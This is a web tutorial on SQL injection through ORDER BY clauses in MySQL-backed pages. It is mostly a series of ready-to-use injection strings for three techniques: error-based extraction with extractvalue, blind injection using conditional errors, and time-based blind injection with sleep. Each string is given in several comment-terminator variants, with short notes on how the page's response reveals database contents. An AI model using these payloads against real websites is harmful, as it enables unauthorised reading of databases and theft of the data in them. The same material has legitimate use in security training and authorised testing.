Hello I hope you enjoyed reading our SQL Injection tutorials. In this tutorial we will discuss how we can inject when the point of injection is order by clause or group by clause.

First of all i will start with order by injection because injecting into group by queries is really simple and simple union based injection can be used when we are injecting in order by clause.

There are Three ways we are going to discuss how to inject into order by clause.
1. Error Based Injection
2. Error Based Blind Injection
3. Time Based Blind Techniques.

Exploitation using XPATH injection.

Query:
select posts from content where submit=1 order by $sort
Injection
input : 1,extractvalue(0x0a,concat(0x0a,(select database())))#
input : 1,extractvalue(0x0a,concat(0x0a,(select database())))--
input : 1,extractvalue(0x0a,concat(0x0a,(select database())))--+

The above query will output the data in form of error. for rest of Exploitation using XPATH read XPATH Injection

select posts from content where submit=1 order by `$sort`
In such cases you will see the column name in the parameter so just close that first and then inject
input : id`,extractvalue(0x0a,concat(0x0a,(select database())))#
input : id`,extractvalue(0x0a,concat(0x0a,(select database())))--
input : id`,extractvalue(0x0a,concat(0x0a,(select database())))--+
The above query will output the data in form of error. for rest of Exploitation using XPATH read XPATH Injection

Error Based Blind Injection

This is the case when you can not see any direct error from database. So in such cases we create the error ourselves and by the behaviour like no output or some other kind of error we can know that its a Error. Now below is a query i created in such a manner that if the output is true only then it will create error else it will work. By looking at the page we will come to know is it true or false.
select posts from content where submit=1 order by `$sort`
In such cases you will see the column name in the parameter so just close that first and then inject

Injections
input : id`,extractvalue(null,concat((select 0 from dual where database() like database()),0x3a))--+
input : id`,extractvalue(null,concat((select 0 from dual where database() like database()),0x3a))--
input : id`,extractvalue(null,concat((select 0 from dual where database() like database()),0x3a))#

Here you can see the condition database() like database() here you can use any condition to test, and other blind injections syntax will also work over here. You can use it to extract the database using blind injection.

select posts from content where submit=1 order by `$sort`
Remember when you will try to create an error over here it will show unknown column error its not different from the above one which we injected using XPATH, but the same can be injected using the below injection which can be used in cases when XPATH functions are not available of disabled.

Injection Syntax

Injections
input : id`,(select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1--+
input : id`,(select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1--
input : id`,(select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1#

Here you can see the condition 1=1 here you can use any condition to test, and other blind injections syntax will also work over here. You can use it to extract the database using blind injection.


For rest of Exploitation you can use Blind Injection.

Exploitation using Time Based Blind Techniques.

Some times you could face a condition where both true and false are not having any difference or the page is redirected somewhere. In such case it becomes tough to use Blind Injection. What we will do now is create query in such a way that it will delay if its true else reply normally.
Query:
select posts from content where submit=1 order by `$sort`
Injection
input : id`,(select sleep(10) from dual where database() like database())#
input : id`,(select sleep(10) from dual where database() like database())--
input : id`,(select sleep(10) from dual where database() like database())--+

The above query will Reply normally if the condition is false otherwise it will take time to reply and this is how we will extract the data. for rest of Exploitation using Time based Blind read Time Based Blind Injection


Author : Zenodermus Javanicus
Date : 2014-04-27